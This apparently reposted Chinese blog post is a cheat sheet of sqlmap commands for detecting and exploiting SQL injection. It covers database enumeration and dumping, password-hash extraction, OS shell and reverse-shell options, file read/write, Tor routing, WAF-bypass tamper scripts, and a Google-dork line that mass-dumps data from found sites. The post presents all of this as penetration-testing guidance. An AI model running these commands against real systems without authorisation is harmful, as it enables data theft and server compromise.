【SQLmap】常用命令

文章目录

  • 实际使用案例
  • 常用命令
    • 基本命令
    • 数据库指纹识别
    • 用户信息
    • 用户权限
    • 数据库枚举
    • 数据导出
    • 密码哈希
    • 操作系统命令执行
    • 文件操作
    • 代理和网络
    • 参数指定
    • 保存恢复
    • 自动搜索注入
    • 智能模式
    • 等级设置
    • 自动注入
    • WAF 绕过
    • 杂项
    • 帮助和支持

SQLmap 是一款开源的自动化 SQL 注入检测和利用工具,广泛用于网络安全的渗透测试中。它支持广泛的数据库服务器,能够自动化地检测和利用大多数的 SQL 注入漏洞,以及对数据库服务器进行不同程度的访问和控制。

在这里插入图片描述

实际使用案例

假设你已经确定一个 URL 存在 SQL 注入漏洞,你可以使用以下命令来进一步探测和利用它:

sqlmap -u "http://example.com/index.php?id=1" --dbs

这个命令会列出所有数据库。

接下来,如果你想获取特定数据库中的所有表名:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

若要导出某个表的数据:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

常用命令

以下是 SQLmap 的一些重要命令和功能:

基本命令

  • sqlmap -u "TARGET_URL":对指定的 URL 进行注入测试。

数据库指纹识别

  • --banner:获取数据库的详细信息。
  • --dbms "Mysql":指定数据库类型。

用户信息

  • --users:列出数据库中的所有用户。
  • --current-user:确定当前连接的数据库用户。
  • --is-dba:检查当前用户是否具有数据库管理员权限。

用户权限

  • --privileges:列出数据库用户的权限。
  • --privileges -U root:查看指定用户权限。

数据库枚举

  • --dbs:列出所有数据库。
  • -D DATABASE_NAME --tables:列出指定数据库的所有表。
  • -D DATABASE_NAME -T TABLE_NAME --columns:列出指定表的所有列。
  • --start 1 --stop 20:列出 20 条。

数据导出

  • -D DATABASE_NAME -T TABLE_NAME -C COLUMN_NAME --dump:导出指定数据库、表或列的数据。

密码哈希

  • --passwords:尝试获取数据库用户的密码哈希。

操作系统命令执行

  • --os-cmd="COMMAND":在支持的数据库上执行操作系统命令。
  • --os-shell:提供一个交互式的 shell 环境。
  • --udf-inject:导入用户自定义函数(获取系统权限)。
  • --os-pwn :反弹 shell。

文件操作

  • --file-read=FILE_PATH:从数据库服务器读取文件。
  • --file-write=FILE_PATH --file-dest=DEST_PATH:将文件写入数据库服务器。
  • --reg-read :读取 win 系统注册表

代理和网络

  • --proxy=PROXY:通过指定的代理服务器进行 SQLmap 的所有请求。
  • --tor:使用 Tor 匿名网络。
  • --delay=DELAY_SECONDS:设置请求之间的延迟时间。
  • --timeout=TIMEOUT_SECONDS:设置请求的超时时间。

参数指定

  • --string"STRING_ON_TRUE_PAGE":指定关键词。
  • --data "id=3" :设置post参数。
  • --cookie "COOKIE_VALUE" :设置cookie。
  • --random-agent:使用随机 User-Agent 头发送请求。
  • --sql-shell :执行指定 sql 命令

保存恢复

  • --dbs-o "sqlmap.log":保存进度。
  • --dbs -o "sqlmap.log" --resume":恢复进度。

自动搜索注入

  • sqlmap -g "google 语法" --dump-all --batch:搜索注入点自动 跑出所有字段。

智能模式

  • --smart:启用智能模式,使用更少的查询来确定数据库的类型,以及数据库中表和字段的名称。

等级设置

  • --level:这个选项用来定义测试的级别。

自动注入

  • --batch:无需交互,自动执行。

WAF 绕过

  • --tamper=TAMPER_SCRIPTS:使用篡改脚本来尝试绕过 WAF。

杂项

  • --beep:发现 SQL 注入时发出蜂鸣声。
  • --check-payload:检查 IDS 对注入有效负载的检测。
  • --forms:解析和测试目标 URL 的表单。

帮助和支持

  • sqlmap -hsqlmap --help:显示帮助信息。
  • sqlmap -v:显示程序的版本号。

想要成为无论多么悲伤的时候,也能够漂亮微笑的人吧。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/863917.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

你真的会udf提权???数据库权限到系统权限 内网学习 mysql的udf提权操作 ??msf你会用了吗???

你真的会udf提权???数据库权限到系统权限 内网学习 mysql的udf提权操作 ??msf你会用了吗???

我们在已经取得了数据库的账号密码过后,我们要进一步进行提取的操作,我们mysql有4钟提权的操作。 udf提权(最常用的)mof提权启动项提权反弹shell提权操作 怎么获取密码操作: 怎么获取密码,通过sql注入获取这个大家都应该知道了&a…
阅读更多...
Python-数据分析组合可视化实例图【附完整源码】

Python-数据分析组合可视化实例图【附完整源码】

数据分析组合可视化实例图 开篇:应女朋友的要求,于是写下了这篇详细的数据可视化代码及完整注释 一:柱状图、折线图横向组合网格布局 本段代码使用了pyecharts库来创建一个包含多个图表(柱状图、折线图)和网格布局的…
阅读更多...
第一周:李宏毅机器学习笔记

第一周:李宏毅机器学习笔记

第一周学习周报 摘要一、机器学习基础理论1. 什么是机器学习?2. 机器学习“寻找”的函数有哪些类型?3. 机器学习中机器如何“寻找”函数?三步走3.1 第一步:设定函数的未知量(Function with Unknown Parameters&#xf…
阅读更多...
Vue3 按钮根据屏幕宽度展示折叠按钮

Vue3 按钮根据屏幕宽度展示折叠按钮

文章目录 一、组件封装二、使用三、最终效果(参考)四、参考 一、组件封装 ButtonFold.vue 1、获取父组件的元素,根据元素创建动态插槽 2、插槽中插入父元素标签。默认效果和初始状态相同。 3、当屏幕宽度缩小时,部分按钮通过 dropdown 的方式展示出来&a…
阅读更多...
springboot使用测试类报空指针异常

springboot使用测试类报空指针异常

检查了Service注解,还有Autowired注解,还有其他注解,后面放心没能解决问题,最后使用RunWith(SpringRunner.class)解决了问题!! 真的是✓8了,烦死了这个✓8报错!
阅读更多...
C语言 | Leetcode C语言题解之第200题岛屿数量

C语言 | Leetcode C语言题解之第200题岛屿数量

题目: 题解: void cleanLand(char** grid, int gridSize, int ColSize,int row,int column) {if(grid[row][column] 1){//不等于1则清零grid[row][column] 0;}else{//不等于1则返回return ;}int newRow;int newColumn;//上if(row ! 0) //还能上{ne…
阅读更多...
每天五分钟计算机视觉:人体姿势识别

每天五分钟计算机视觉:人体姿势识别

本文重点 人体姿势识别是计算机视觉领域的一个重要研究方向,旨在通过图像或视频数据自动检测并识别出人体的各种姿势和动作。随着深度学习技术的快速发展,基于神经网络的方法在这一领域取得了显著进展。神经网络,特别是卷积神经网络(CNN)和循环神经网络(RNN),因其强大…
阅读更多...
基于YOLOv9的PCB板缺陷检测

基于YOLOv9的PCB板缺陷检测

数据集 PCB缺陷检测,我们直接采用北京大学智能机器人开放实验室数据提供的数据集, 共六类缺陷 漏孔、鼠咬、开路、短路、杂散、杂铜 已经对数据进行了数据增强处理,同时按照YOLO格式配置好,数据内容如下 模型训练 ​ 采用YOLO…
阅读更多...
idea乱码问题解决

idea乱码问题解决

乱码问题产生的根本原因 数据的编码和解码使用的不是同一个字符集 使用了不支持某个语言文字的字符集 Tomcat控制台乱码 在tomcat10.1.7这个版本中,修改 tomcat/conf/logging.properties中,所有的UTF-8为GBK即可 sout乱码问题,设置JVM加载.class文件时使用UTF-8字符集 设置虚…
阅读更多...
RedisAtomicInteger并发案例

RedisAtomicInteger并发案例

🍰 个人主页:__Aurora__ 🍞文章有不合理的地方请各位大佬指正。 🍉文章不定期持续更新,如果我的文章对你有帮助➡️ 关注🙏🏻 点赞👍 收藏⭐️ RedisAtomicInteger 提供了对整数的原子性操作&a…
阅读更多...
【SkiaSharp绘图12】SKCanvas方法详解(一)清空、裁切区域设置、连接矩阵、注释、弧与扇形、图集、九宫格绘图、圆

【SkiaSharp绘图12】SKCanvas方法详解(一)清空、裁切区域设置、连接矩阵、注释、弧与扇形、图集、九宫格绘图、圆

文章目录 SKCanvas 方法Clear 清空ClipPath/ClipRect/ClipRegion/ClipRoundRect 设置裁切区域Concat 连接矩阵DrawAnnotation绘制注释DrawArc绘制椭圆弧、扇形DrawAtlas绘制图集(一个图像、多个区域、多个缩放、一次绘制)DrawBitmap绘制图像DrawBitmapNinePatch九宫…
阅读更多...
深度学习评价指标:Precision, Recall, F1-score, mIOU, 和 mDice

深度学习评价指标:Precision, Recall, F1-score, mIOU, 和 mDice

在深度学习和机器学习中,评价模型性能是至关重要的一环。本文将详细讲解一些常见的评价指标,包括精确率(Precision)、召回率(Recall)、F1-score、平均交并比(mIOU)和平均Dice系数&am…
阅读更多...
5.6 0-1背包问题

5.6 0-1背包问题

#include<iostream> #include<string> #include<stdlib.h> #include<bits/stdc.h> using namespace std;int c;//背包容纳的重量 int n;//物品数量 int cw;//当前重量 int cv;//当前价值 int bestv;//当前最优价值 int x[100]; int bestx[100]; struct…
阅读更多...
Linux 交叉编译工具链格式 sqlite3编译示例

Linux 交叉编译工具链格式 sqlite3编译示例

1、交叉编译工具链 1.1 定义 交叉编译工具链是一个由编译器、连接器和解释器组成的综合开发工具集&#xff0c;它允许开发者在一个平台上&#xff08;例如高性能的PC或服务器&#xff09;编译生成另一个平台&#xff08;例如嵌入式系统或不同的操作系统和硬件架构&#xff09…
阅读更多...
pyqt 文件浏览列表视图和图标视图

pyqt 文件浏览列表视图和图标视图

pyqt 文件浏览列表视图和图标视图 目的效果代码 目的 使用pyqt实现文件浏览列表视图和图标视图&#xff0c;像电脑文件浏览一样。如下图所示。 效果 代码 import sys from PyQt5.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QWidget, QToolBar, QAction, Q…
阅读更多...
03-权限绕过漏洞

03-权限绕过漏洞

一、基础知识 水平越权 水平越权是指用户在系统中拥有超出其权限范围的访问权限。这可能导致安全漏洞和潜在的风险&#xff0c;因为用户可以访问他们不应该有权访问的敏感信息或执行他们不应该执行的操作。 垂直越权 垂直越权是指用户或攻击者利用系统中的漏洞或错误配置&a…
阅读更多...
Orangepi Zero2使用外设驱动库wiringOP配合定时器驱动SG90舵机

Orangepi Zero2使用外设驱动库wiringOP配合定时器驱动SG90舵机

目录 一、舵机的基本认知和硬件接线 1.1 舵机的基本认知&#xff1a; 1.2 硬件接线&#xff1a; 1.3 怎么控制舵机旋转不同的角度&#xff1a; 二、Linux定时器 2.1 定时器setitimer()函数原型和头文件&#xff1a; 2.2 信号处理函数signal()原型和头文件&#xff1a; 2…
阅读更多...
<电力行业> - 《第10课:变电》

<电力行业> - 《第10课:变电》

1 变电 变电环节&#xff0c;顾名思义就是改变电压的环节&#xff0c;主要是在变电站和变电所完成的。变电站和变电所主要区别在于&#xff1a;变电站比变电所更大。 发电厂的变压器和配电变压器也属于“变电”&#xff0c;但我们在说电网环节时&#xff0c;变电特指电网公司…
阅读更多...
【STM32嵌入式系统设计与开发---传感器拓展】——1_4_标准库FreeRTOS移植实验

【STM32嵌入式系统设计与开发---传感器拓展】——1_4_标准库FreeRTOS移植实验

目录 雅俗理解源码下载链接知识拓展步骤1&#xff1a;stm32f103vet6移植freeRTOS步骤:&#xff08;1&#xff09;准备开发环境&#xff08;2&#xff09;添加FreeRTOS移植 致谢 雅俗理解 雅&#xff1a;FreeRTOS是一个开源的实时操作系统&#xff08;RTOS&#xff09;&#xf…
阅读更多...
RabbitMQ-交换机的类型以及流程图练习-01

RabbitMQ-交换机的类型以及流程图练习-01

自己的飞书文档:‌‍‬‍‬‍​‍‬​⁠‍​​​‌⁠​​‬‍​​​‬‬‌​‌‌​​&#xfeff;​​​​&#xfeff;‍​‍​‌&#xfeff;⁠‬&#xfeff;&#xfeff;&#xfeff;​RabbitMQ的流程图和作业 - 飞书云文档 (feishu.cn) 作业 图片一张 画rabbit-mq 消息发…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023